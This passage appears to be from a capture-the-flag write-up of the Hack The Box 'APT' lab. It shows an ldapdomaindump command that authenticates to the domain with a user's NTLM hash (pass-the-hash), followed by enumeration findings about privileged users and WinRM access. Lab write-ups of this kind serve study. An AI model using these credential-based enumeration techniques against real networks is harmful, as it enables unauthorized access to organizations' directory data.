ldapdomaindump
Using the credential of the henry.vinson user, dumping domain information with ldapdomaindump
┌──(kali㉿kali)-[~/…/htb/labs/apt/ldapdomaindump]
└─$ ldapdomaindump apt.htb.local -u 'htb.local\henry.vinson' -p aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb -n $IPv6 --no-json --no-grep
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finishedDump complete
Computers
The target system is a Windows Server 2016 Standard as enumerated earlier
Users
As expected, the henry.vinson_adm user has a higher privilege as the user is part of the Remote Management Users group
The user is able to WinRM to the target system
Groups
The apt-Admins group is the only none default domain group